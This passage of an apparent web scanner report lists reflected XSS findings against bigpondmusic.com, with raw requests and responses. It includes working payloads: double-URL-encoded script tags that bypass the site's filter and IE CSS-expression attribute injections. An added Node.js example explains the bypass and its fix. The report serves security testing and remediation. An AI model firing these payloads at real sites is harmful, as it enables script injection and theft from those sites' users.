Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:14:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88022


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news9f408"><script>alert(1)</script>b3052a20ef0/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011" />
...[SNIP]...

2.392. http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f547a'%3b77363121576 was submitted in the REST URL parameter 1. This input was echoed as f547a';77363121576 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /newsf547a'%3b77363121576/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:14:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87971


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
strabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'newsf547a';77363121576';
   s.prop4 = 'article';
   s.prop5 = '5084';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.ch
...[SNIP]...

2.393. http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 235a2'%3bd3bafbd4249 was submitted in the REST URL parameter 2. This input was echoed as 235a2';d3bafbd4249 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/article235a2'%3bd3bafbd4249/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88065


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
t,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'news';
   s.prop4 = 'article235a2';d3bafbd4249';
   s.prop5 = '5084';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4 +
...[SNIP]...

2.394. http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e458a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1ca07dca643 was submitted in the REST URL parameter 2. This input was echoed as e458a"><script>alert(1)</script>1ca07dca643 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/articlee458a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1ca07dca643/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88209


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/articlee458a"><script>alert(1)</script>1ca07dca643/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011" />
...[SNIP]...

2.395. http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8eb0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e25e9ca5a695 was submitted in the REST URL parameter 4. This input was echoed as f8eb0"><script>alert(1)</script>25e9ca5a695 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011f8eb0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e25e9ca5a695 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:15:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 118667


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Nick Cave And The Bad Seeds
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011f8eb0"><script>alert(1)</script>25e9ca5a695" />
...[SNIP]...

2.396. http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a4bdc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ef1173296c3 was submitted in the REST URL parameter 4. This input was echoed as a4bdc'style='x:expression(alert(1))'ef1173296c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (CSS expressions are evaluated by IE 7 and earlier, and by IE 8 only in compatibility mode) and does not work in other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011a4bdc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ef1173296c3 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:15:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 118544


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Nick Cave And The Bad Seeds
...[SNIP]...
<link rel='canonical' href='http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011a4bdc'style='x:expression(alert(1))'ef1173296c3' />
...[SNIP]...

2.397. http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c248"style%3d"x%3aexpression(alert(1))"d354a3a5ee6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c248"style="x:expression(alert(1))"d354a3a5ee6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (CSS expressions are evaluated by IE 7 and earlier, and by IE 8 only in compatibility mode) and does not work in other browsers.

Request

GET /news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011?3c248"style%3d"x%3aexpression(alert(1))"d354a3a5ee6=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:14:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 118232


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Nick Cave And The Bad Seeds
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011?3c248"style="x:expression(alert(1))"d354a3a5ee6=1" />
...[SNIP]...

2.398. http://bigpondmusic.com/search [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /search

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ddea'%3b2c2553be200 was submitted in the REST URL parameter 1. This input was echoed as 8ddea';2c2553be200 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search8ddea'%3b2c2553be200 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87922


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
rabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'search8ddea';2c2553be200';
   
   
       s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel;
   s.prop11 = 'Non-Registered-Music';
   s.prop12 = 'Non-Registe
...[SNIP]...

2.399. http://bigpondmusic.com/search [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /search

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ae5d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e575939b96dc was submitted in the REST URL parameter 1. This input was echoed as 4ae5d"><script>alert(1)</script>575939b96dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search4ae5d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e575939b96dc HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88056


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/search4ae5d"><script>alert(1)</script>575939b96dc" />
...[SNIP]...

2.400. http://bigpondmusic.com/search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28209"style%3d"x%3aexpression(alert(1))"5214d55964b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 28209"style="x:expression(alert(1))"5214d55964b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (CSS expressions are evaluated by IE 7 and earlier, and by IE 8 only in compatibility mode) and does not work in other browsers.
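
Findings 2.389, 2.390, 2.391, 2.394, 2.395, 2.396, 2.397, 2.399 and 2.400 above all land in an HTML attribute: the double-quoted value of the parentUrl hidden input, or the single-quoted href of the canonical link. The path-segment cases additionally show the double-URL-encoding bypass, where a filter inspects the value before the application performs a second, unnecessary URL-decode. The Node.js model below is an added example, not code from the Burp report or from the bigpondmusic.com application; it reproduces the filter bypass with the 2.391 payload and shows the fix the remediation text asks for (decode once, validate that canonical value, attribute-encode on output). Function names and the filter's exact character set are assumptions.

```javascript
// Added example for this report; it is not code from the Burp output or
// from the bigpondmusic.com application. It models a metacharacter filter
// that a double-URL-encoded path segment walks past because the
// application URL-decodes a second time, and the fix: no second decode,
// validation on the canonical value, attribute encoding on output.
// Function names and the filter's character set are assumptions.

// Characters a typical "block the usual XSS characters" filter rejects.
const XSS_METACHARS = /[<>"']/;

// Vulnerable pipeline. `segment` is the REST URL parameter as the web
// server hands it over, i.e. already URL-decoded once. The filter runs
// first, then the application decodes again and writes the result into
// a double-quoted attribute unencoded.
function vulnerableRender(segment) {
  if (XSS_METACHARS.test(segment)) {
    return null; // the request is "blocked"
  }
  const twiceDecoded = decodeURIComponent(segment); // the needless second decode
  return '<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/' +
    twiceDecoded + '" />';
}

// Attribute encoding: the characters that can end or alter an attribute
// value under either quoting style become entities, so the same function
// also covers the single-quoted href='...' of the canonical link.
function encodeForHtmlAttribute(s) {
  const entities = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => entities[c]);
}

// Fixed pipeline: the web server's single decode is the canonical form,
// any validation belongs on exactly that value (not on a re-decoded
// copy), and the output is encoded for the context it lands in.
function safeRender(segment) {
  return '<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/' +
    encodeForHtmlAttribute(segment) + '" />';
}

// Check: did the input stay inside value="..."? The template contains
// exactly six double quotes; one more means the input terminated the
// attribute and whatever follows is parsed as markup.
const TEMPLATE_QUOTE_COUNT = 6;
function attributeIntact(html) {
  return html !== null && (html.match(/"/g) || []).length === TEMPLATE_QUOTE_COUNT;
}

// Constructed inputs. The first is the 2.391 payload after the web
// server's one decode (%2522 -> %22, %253e -> %3e, and so on). The second
// is the raw-quote style of 2.390/2.397/2.400, which the report shows
// arriving in the query string without being filtered.
const DOUBLE_ENCODED = 'news9f408%22%3e%3cscript%3ealert%281%29%3c%2fscript%3eb3052a20ef0';
const RAW_QUOTE = '690b2"style="x:expression(alert(1))"f70bb7279cc';

console.log(vulnerableRender(DOUBLE_ENCODED)); // passes the filter, <script> lands in the page
console.log(safeRender(DOUBLE_ENCODED));       // same input, stays literal text
console.log(safeRender(RAW_QUOTE));            // quotes become &quot;, the attribute survives
```

The quote-count check is deliberately crude: it is there to make the breakout visible in a test, not to stand in for an HTML parser. The part that matters for the fix is that `safeRender` never decodes again and always encodes, so it is correct whether or not the filter in front of it is present.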

Request

GET /search?28209"style%3d"x%3aexpression(alert(1))"5214d55964b=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:29:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87953


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Search Results - BigPond Mus
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/search?28209"style="x:expression(alert(1))"5214d55964b=1" />
...[SNIP]...

2.401. http://bigpondmusic.com/urlshorten/totwitter [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /urlshorten/totwitter

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be2aa'%3b45aad6d3561 was submitted in the REST URL parameter 1. This input was echoed as be2aa';45aad6d3561 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /urlshortenbe2aa'%3b45aad6d3561/totwitter HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:21 GMT
